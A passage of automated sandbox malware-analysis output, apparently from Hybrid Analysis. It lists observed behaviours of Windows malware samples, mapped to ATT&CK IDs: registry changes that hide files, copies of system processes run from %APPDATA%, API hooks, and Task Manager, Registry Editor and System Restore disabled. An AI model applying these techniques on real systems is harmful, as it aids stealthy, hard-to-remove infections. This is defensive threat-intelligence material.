\"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"CSRSS.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"SERVICES.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"LSASS.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")\n \"SMSS.EXE\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\\\")\n \"SMSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDEFILEEXT\"; Value: \"01000000\")\n \"SMSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"HIDDEN\"; Value: \"00000000\")\n \"SMSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED\"; Key: \"SHOWSUPERHIDDEN\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1546.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005156)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005324)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005628)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005348)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005808)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005284)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005432)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003448)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002104)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005636)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001456)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005520)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001288)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006012)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005072)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005756)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00005700)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00006092)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003240)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004924)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005728)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004588)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005644)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003984)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003652)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003728)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004136)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005688)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005420)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005992)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003376)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001164)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002668)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005888)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003388)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003384)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001612)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003404)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004164)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003900)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002132)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002812)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-21", "type": 3, "relevance": 6, "name": "Disables Command Prompt (cmd)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")\n \"SMSS.EXE\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"DISABLECMD\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-3", "type": 3, "relevance": 9, "name": "Disables Windows Task Manager (taskmgr)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SMSS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")\n \"SMSS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLETASKMGR\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Ransomware/Banking", "identifier": "registry-2", "type": 3, "relevance": 9, "name": "Disables Windows Registry Editor (regedit)", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"D3_08.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"IExplorer.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"LSASS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SMSS.EXE\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")\n \"SMSS.EXE\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"DISABLEREGISTRYTOOLS\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "registry-23", "type": 3, "relevance": 9, "name": "Disables system restore", "description": "\"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"946b376a771cf97e6aa7e88de9157cf4794255c614bd946e2b53ae5b6c731d96.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"D3_08.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"IExplorer.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"WINLOGON.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"CSRSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"SERVICES.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"LSASS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")\n \"SMSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLECONFIG\"; Value: \"01000000\")\n \"SMSS.EXE\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS NT\\SYSTEMRESTORE\"; Key: \"DISABLESR\"; Value: \"01000000\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110
https://hybrid-analysis.com/sample/c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110
Hybrid Analysis - Killers
{"size": 491520, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110", "sha256": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110", "av_detect": 93, "vx_family": "Dropper.Generic.Dacic.3035", "threat_score": 80, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 1, "total_signatures": 128, "extracted_files": [{"name": "gegdsimsogm.exe", "file_path": "%TEMP%\\gegdsimsogm.exe", "file_size": 327680, "sha256": "c8c542ac3f6526d1501c2b9d6262bfa029a1ac0d9dd6b3c1965977abdd8bd126", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe (PID: 5872)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "91a9142e2fe81ebe9d16f0342ba1924198f1dbd8e773f8d3c9a39f63f7478830", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "runtime_process": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe (PID: 5872)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A9C8A7.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110.exe (PID: 5872)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "1 .RES Files linked with CVTRES.EXE 7.10 (Visual Studio .NET 2003) (build: 3052)", "3 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["3 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "12 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)", "40 .C Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "1 .OBJ Files linked with ALIASOBJ.EXE 7.10 BETA (Internal OLDNAMES.LIB Tool) (build: 2067)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (3 files)"], 